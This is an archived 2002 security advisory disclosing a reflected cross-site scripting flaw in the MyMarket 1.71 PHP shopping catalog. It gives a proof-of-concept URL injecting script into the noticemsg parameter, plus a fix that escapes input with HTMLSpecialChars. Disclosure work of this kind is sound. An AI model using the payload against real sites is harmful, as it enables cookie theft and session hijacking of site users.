+----------------------+ | XSS in MyMarket 1.71 | +----------------------+ Product Description =================== MyMarket is a fully functional online shopping catalog system, built using PHP and MySQL. It was created by Ying Zhang for the purpose of teaching people about the basics of creating an E-Commerce site. It can be found at http://mymarket.sourceforge.net/ Vulnerable systems ================== MyMarket 1.71 Exploit ======= http://[traget]/templates/form_header.php?noticemsg=<Scr*ipt>javascript:aler t(document.cookie)</Scr*ipt> (without "*") Solution ======== put this two lines at the begin of form_header.php ---- form_header.php ----- <? $noticemsg = HTMLSpecialChars($noticemsg); $errormsg = HTMLSpecialChars($errormsg); ... -------------------------- Vendor response =============== I submitted this a week ago, the vendor didn't response yet. ------------------------------ Tim Vandermeersch qber66at_private http://users.pandora.be/tim/
This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 14:00:40 PDT